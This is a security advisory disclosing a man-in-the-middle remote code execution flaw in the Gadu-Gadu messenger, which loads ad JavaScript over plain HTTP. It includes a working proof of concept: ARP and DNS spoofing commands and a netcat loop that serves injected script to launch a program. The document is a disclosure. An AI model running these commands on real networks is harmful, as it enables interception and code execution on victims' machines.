Gadu-Gadu Remote Code Execution

`Vendor: Gadu-Gadu (http://gadu-gadu.pl)  
Vulnerable Version: All  
Vulnerability Type: MITM, Remote Code Execution  
Risk level: High  
Credit: Kacper Szczesniak <[email protected]>  
Vulnerability Details:  
  
Gadu-Gadu is vulnerable to the Man-In-The-Middle attack allowing  
remote code execution on a victim host.  
JavaScript code is loaded from external HTTP location to display ads.  
If an attacker is able to take over HTTP request it's possible to  
inject JS code into WebKit User Interface. Internal communication  
mechanisms can be used to spawn new processes. No user interaction or  
contact list presence is needed as ads are loaded automatically.  
  
a trivial PoC to spawn notepads all over CoffeeHeaven/LAN:  
  
# echo 1 > /proc/sys/net/ipv4/ip_forward  
# arp -s GW_IP GW_MAC  
# arpspoof -i eth0 GW_IP  
# echo "YOURIP *.adocean.pl" > /tmp/x  
# dnsspoof -i eth0 -f /tmp/x  
# while [ 1 ] ; do echo -ne "HTTP/1.0 200 OK\r\nConnection:  
close\r\nContent-Length: 239\r\nContent-Type:  
text/html\r\n\r\nb=document.getElementsByTagName(\"body\").item(0);\r\nb.innerHTML='<a  
id=\"a\" href=\"c:/windows/notepad.exe\"></a>';\r\na=document.getElementById('a');\r\ne=document.createEvent('HTMLEvents');\r\ne.initEvent('click',  
true, true);\r\na.dispatchEvent(e);\r\n" | nc -l 80 ; done  
  
  
BTW last vulnerability was not really patched. Only message filter was  
introduced so it's still possible to take advantage of it using  
another MITM.  
  
kacper  
  
`